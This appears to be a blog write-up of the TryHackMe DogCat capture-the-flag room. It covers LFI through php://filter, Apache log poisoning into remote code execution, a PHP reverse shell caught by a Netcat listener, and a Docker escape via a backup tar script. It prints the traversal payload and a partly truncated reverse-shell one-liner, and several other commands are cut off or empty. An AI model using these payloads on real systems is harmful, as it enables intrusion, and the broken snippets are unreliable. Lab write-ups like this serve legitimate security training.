Unveiling the Secrets of DogCat: A Deep Dive into LFI and Docker…
In the vast landscape of cybersecurity, understanding vulnerabilities and exploiting them responsibly is crucial. The DogCat room on TryHackMe offers a unique opportunity to delve into Local File Inclusion (LFI) and Docker privilege escalation. This article will guide you through the process, ensuring you grasp the nuances and complexities involved.
Step 1: Scanning the Target
The journey begins with a thorough scan of the target machine. Using Nmap, a powerful network scanning tool, we can identify open ports and services. The command `nmap -sV -p-
- Port 80: HTTP – This port hosts a website displaying dog and cat pictures.
- Port 22: SSH – Secure Shell (SSH) is a protocol for secure remote login and other secure network services.
Step 2: Enumerating the Web
With the initial scan complete, it’s time to explore the website hosted on port 80. The URL structure is parameter-based, a common indicator of potential vulnerabilities. To test for LFI, we need to manipulate the URL parameters.
Testing for LFI
The initial approach involves using the `../` directory traversal method. However, this method only works when the URL contains a “dog” or “cat” keyword. For instance, `?view=dog/../index` results in a “file cannot be opened” error. This is because the `containsStr()` function is being declared multiple times, likely due to the `index.php` file being included multiple times by the LFI payload.
Bypassing the Issue
To bypass this issue, we can use the `php://filter` wrapper. This wrapper allows us to read a file’s source code without executing it, preventing the function re-declaration error. The command `?view=php://filter/convert.base64-encode/resource=dog/../../.././…var/www/html/index` reads the index file. The code suggests that to make the LFI work on other files, we need to put another variable `$ext` in the URL.
Step 3: LFI to RCE – Log Poisoning
Log poisoning is a powerful attack method where malicious input is injected into application logs. This can be exploited to gain Remote Code Execution (RCE) via an LFI vulnerability.
Injecting Malicious Input
Using Developer Tools, we can inject the string “Hello World” into the User-Agent header. This string is reflected in the `access.log` files, confirming the vulnerability.
Injecting the Payload
The next step is to inject a PHP payload into the log. The payload `` leverages the `cmd` parameter in the URL, allowing it to be passed to the PHP `system()` function. This enables the execution of system commands directly on the target server.
Executing the Payload
To execute the payload, we need to include the poisoned log file via the LFI vulnerability. This can be done by manipulating the URL parameters. Once the payload is executed, we can gain a foothold on the target system and retrieve the first flag.
Step 4: Getting a Reverse Shell
With the initial foothold established, the next step is to gain a reverse shell. This allows us to interact with the target system more effectively.
URL Encoding the Payload
The payload `php -r ‘$sock=fsockope… <&3 >&3 2>&3″);` is URL encoded and injected into the target system. This payload creates a reverse shell, connecting back to our machine.
Setting Up a Netcat Listener
A Netcat listener is set up on our machine to receive the reverse shell. Once the payload is executed, we gain a reverse shell and can navigate the file system to retrieve the second flag.
Step 5: Privilege Escalation
With a reverse shell established, the next step is to escalate privileges. This involves finding and exploiting vulnerabilities that allow us to gain root access.
Using Sudo -l
The `sudo -l` command lists the commands a user is allowed to run with sudo without providing their password. This information is crucial for privilege escalation assessments.
Step 6: Docker Breakout
The DogCat room is hosted in a Docker environment. This presents an opportunity to exploit Docker-specific vulnerabilities.
Finding the Backup File
Upon inspecting the system, we find a backup file in `/opt`. The `launch.sh` file reveals that a volume is mounted from the Docker container to the host system.
Exploiting the Backup File
The `backup.sh` script creates a tar archive of the `/root/container` directory. This archive can be exploited to gain root access. By manipulating the tar archive, we can escape the Docker container and gain root access on the host system.
Conclusion
The DogCat room on TryHackMe offers a comprehensive exploration of LFI and Docker privilege escalation. By following the steps outlined in this article, you can gain a deep understanding of these vulnerabilities and learn how to exploit them responsibly.
FAQ
What is LFI?
Local File Inclusion (LFI) is a vulnerability that allows an attacker to include or execute files on the target system. This can be exploited to read sensitive files or gain Remote Code Execution (RCE).
What is Docker privilege escalation?
Docker privilege escalation involves exploiting vulnerabilities in the Docker environment to gain root access on the host system. This can be done by manipulating mounted volumes or exploiting misconfigurations in the Docker container.
How can I protect against LFI and Docker privilege escalation?
To protect against LFI, ensure that user input is validated and sanitized. To protect against Docker privilege escalation, ensure that Docker containers are run with the least privileges necessary and that mounted volumes are secured.
What tools can I use to test for LFI and Docker privilege escalation?
Tools like Nmap, Burp Suite, and Metasploit can be used to test for LFI and Docker privilege escalation. Additionally, resources like RevShells and GTFOBins can provide valuable payloads and exploitation techniques.
Is it legal to exploit vulnerabilities in the DogCat room?
Exploiting vulnerabilities in the DogCat room is legal as long as it is done responsibly and ethically. The room is designed for educational purposes, and exploiting it can help you learn and improve your cybersecurity skills.
Leave a Comment